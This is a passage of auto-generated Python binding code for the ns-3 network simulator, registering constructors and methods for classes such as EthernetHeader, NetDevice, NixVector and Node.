## ethernet-header.h (module 'network'): uint64_t ns3::EthernetHeader::GetPreambleSfd() const [member function]
cls.add_method('GetPreambleSfd',
'uint64_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): ns3::Mac48Address ns3::EthernetHeader::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Mac48Address',
[],
is_const=True)
## ethernet-header.h (module 'network'): static ns3::TypeId ns3::EthernetHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetDestination(ns3::Mac48Address destination) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Mac48Address', 'destination')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetLengthType(uint16_t size) [member function]
cls.add_method('SetLengthType',
'void',
[param('uint16_t', 'size')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetPreambleSfd(uint64_t preambleSfd) [member function]
cls.add_method('SetPreambleSfd',
'void',
[param('uint64_t', 'preambleSfd')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetSource(ns3::Mac48Address source) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Mac48Address', 'source')])
return
def register_Ns3EthernetTrailer_methods(root_module, cls):
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer::EthernetTrailer(ns3::EthernetTrailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EthernetTrailer const &', 'arg0')])
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer::EthernetTrailer() [constructor]
cls.add_constructor([])
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::CalcFcs(ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('CalcFcs',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'p')])
## ethernet-trailer.h (module 'network'): bool ns3::EthernetTrailer::CheckFcs(ns3::Ptr<const ns3::Packet> p) const [member function]
cls.add_method('CheckFcs',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p')],
is_const=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::EnableFcs(bool enable) [member function]
cls.add_method('EnableFcs',
'void',
[param('bool', 'enable')])
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetFcs() [member function]
cls.add_method('GetFcs',
'uint32_t',
[])
## ethernet-trailer.h (module 'network'): ns3::TypeId ns3::EthernetTrailer::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetTrailerSize() const [member function]
cls.add_method('GetTrailerSize',
'uint32_t',
[],
is_const=True)
## ethernet-trailer.h (module 'network'): static ns3::TypeId ns3::EthernetTrailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::Serialize(ns3::Buffer::Iterator end) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'end')],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::SetFcs(uint32_t fcs) [member function]
cls.add_method('SetFcs',
'void',
[param('uint32_t', 'fcs')])
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3ListErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ListErrorModel::ListErrorModel(ns3::ListErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ListErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ListErrorModel::ListErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): std::list<unsigned int, std::allocator<unsigned int> > ns3::ListErrorModel::GetList() const [member function]
cls.add_method('GetList',
'std::list< unsigned int >',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::ListErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): void ns3::ListErrorModel::SetList(std::list<unsigned int, std::allocator<unsigned int> > const & packetlist) [member function]
cls.add_method('SetList',
'void',
[param('std::list< unsigned int > const &', 'packetlist')])
## error-model.h (module 'network'): bool ns3::ListErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ListErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3Mac48AddressChecker_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker(ns3::Mac48AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')])
return
def register_Ns3Mac48AddressValue_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48Address const & value) [constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'value')])
## mac48-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Mac48AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): bool ns3::Mac48AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## mac48-address.h (module 'network'): ns3::Mac48Address ns3::Mac48AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Mac48Address',
[],
is_const=True)
## mac48-address.h (module 'network'): std::string ns3::Mac48AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): void ns3::Mac48AddressValue::Set(ns3::Mac48Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Mac48Address const &', 'value')])
return
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
